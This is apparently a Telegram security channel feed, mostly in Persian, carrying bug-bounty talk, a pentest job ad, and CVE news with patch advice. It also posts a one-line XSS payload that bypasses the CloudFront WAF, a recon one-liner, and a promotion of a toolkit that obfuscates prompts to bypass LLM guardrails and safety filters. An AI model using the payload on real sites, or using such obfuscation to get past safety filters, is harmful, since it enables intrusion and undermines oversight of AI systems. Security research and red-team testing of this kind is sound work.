World Of Security
5.18K subscribers
45 photos
10 videos
21 files
620 links
Download Telegram
Tomnomnom shares practical techniques for finding vulnerabilities in modern web applications, covering parameter discovery, JavaScript analysis, recon automation, and how to build effective tooling workflows.

https://tomnomnom.com/talks/wwwww.pdf
6
@TryHackBox - @RadioZeroPod قسمت هفتم زیرو تاک
@RadioZeroPod
⭕️ قسمت هفتم زیرو تاک

📌 موضوع جلسه : واقعیت ‌های باگ بانتی در ایران از جذابیت تا سختی ‌هایی که این حوزه دارد

💢 موضوعات برنامه : قسمت اول تعریف واقع بینانه باگ بانتی در ایران

🎙 مهمان برنامه : مهندس مهرشاد علیزاده

منتظر جلسه بعدی باشید.

🎤 راهبر گفتگوی امنیتی : حسین نائیجی

🆔 @RadioZeroPod
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
6🔥1
رادیو زیرو پاد
@RadioZeroPod – @TryHackBox - @RadioZeroPod قسمت هفتم زیرو تاک
گفت گوی بنده راجب باگ بانتی با دوستان خوبم radio zero pod
Forwarded from World Of Security
از دوستان هرکسی تمایل به همکاری در شرکت آشنا ایمن ( پوزیشن تست نفوذ ) را دارد
یک رزومه برای بنده ارسال کند.

@nashenas_tm


فقط دوستان توجه کنید که شرایط همکاری به صورت حضوری و تمام وقت هست.
دوستان کسی از deepseek api استفاده کرده ؟؟؟
اگر گزینه بهتری دارید لطفاً بگید بیشتر استفاده ام برای offensive هست به همین دلیل توکن سوزی بالاست تقریبا می‌خوام چیزی باشه هم به صرفه باشه و هم قیمت مناسبی داشته باشه اگر پیشنهادی دارید حتما بگید ممنون میشم.
🚨 آسیب‌پذیری افشای اطلاعات در پلاگین وردپرسی Gravity SMTP
باگی با شناسه CVE-2026-4020 کشف شده که به مهاجمین اجازه می‌ده بدون نیاز به احراز هویت (Unauthenticated) به اطلاعات حساسی مثل API Tokens و Keys دسترسی پیدا کنن. این آسیب‌پذیری به شدت تحت اکسپلویت فعاله؛ اگر از این افزونه استفاده می‌کنید، فوراً اون رو به نسخه 2.1.5 آپدیت کنید.
⚠️ چون ممکنه قبل از آپدیت، اطلاعات شما به سرقت رفته باشه پیشنهاد می‌شه تمامی توکن‌ها و API keyهای مربوط رو باطل و با موارد جدید جایگزین کنید.

https://thehackernews.com/2026/06/hackers-exploit-gravity-smtp-wordpress.html?m=1
3
This media is not supported in your browser
VIEW IN TELEGRAM
کشف زنجیره آسیب‌پذیری جدید: root کردن اندروید ۱۷ از طریق فایرفاکس!
گزارش‌های جدید از کشف یک زنجیره اکسپلویت کامل (Browser-to-Kernel) خبر می‌دهند که تنها با کلیک بر روی یک لینک، دسترسی روت (Root) در اندروید ۱۷ ایجاد می‌کند. این اکسپلویت از یک آسیب‌پذیری روز صفر (0-day) استفاده می‌کند.
🔹 جزئیات کلیدی:
شناسه آسیب‌پذیری: CVE-2026-10702
هدف: مرورگر فایرفاکس در اندروید (نسخه‌های قبل از v151.0.2)
سطح دسترسی: دسترسی کامل از مرورگر تا هسته سیستم‌عامل (Kernel)
🔒 توصیه امنیتی: اگر از مرورگر فایرفاکس روی دستگاه‌های اندرویدی خود استفاده می‌کنید، در اسرع وقت آن را به آخرین نسخه (v151.0.2 یا بالاتر) بروزرسانی کنید و از کلیک بر روی لینک‌های مشکوک خودداری نمایید.
🔥112👍1
XSS: Bypass CloudFront WAF
<object/data="javascript:alert/**/(document.domain)">//</object>
🔥92
Wayback URL Recon - One Liner

curl -s 'https://web .archive.org/cdx/search/cdx?url=testphp.vulnweb.com/*&output=text&fl=original&collapse=urlkey&filter=statuscode:200' | grep -viP '\.(png|jpg|jpeg|gif|svg|ico|pdf|css|mp4|woff2?|ttf|eot)(\?|$)' | sed 's/:80\//\//' | sort -u
🔥61
World Of Security
Wayback URL Recon - One Liner curl -s 'https://web .archive.org/cdx/search/cdx?url=testphp.vulnweb.com/*&output=text&fl=original&collapse=urlkey&filter=statuscode:200' | grep -viP '\.(png|jpg|jpeg|gif|svg|ico|pdf|css|mp4|woff2?|ttf|eot)(\?|$)' | sed 's/:80\//\//'…
البته این یک مثال ساده از بروت لاجیک بود. اما کلا ایده اینه که شما بیایی هرچقدر که میتونی همه چیز رو برای خودتون بهینه کنید.

بعضی وقت ها میبینم که بعضی از دوستان مدت هاست که دارن وقت میزارن رو یک ابزار ریکان خفن بدون دانش صحیح ریکان و متدولوژی مناسب ریکان.
6
World Of Security pinned Deleted message
ابزار تخصصی Bypass Guardrail LLM

یکی از دردسرهای اصلی تست امنیت مدل‌های زبانی، ساخت دستی و تکراری payloadهای obfuscated هست.
این toolkit قدرتمند به صورت اتوماتیک پرامپت‌های ورودی رو با مجموعه گسترده‌ای از تکنیک‌های obfuscation، encoding، transformation و evasion پردازش می‌کنه تا بتونی guardrailهای مختلف (safety filters، alignment mechanisms، output restrictions) رو تست و bypass کنی.

https://x.com/intigriti/status/2072245581309792479?t=80c3yWyYo7494DcuQIPb3Q&s=19

https://elder-plinius.github.io/P4RS3LT0NGV3/
🔥61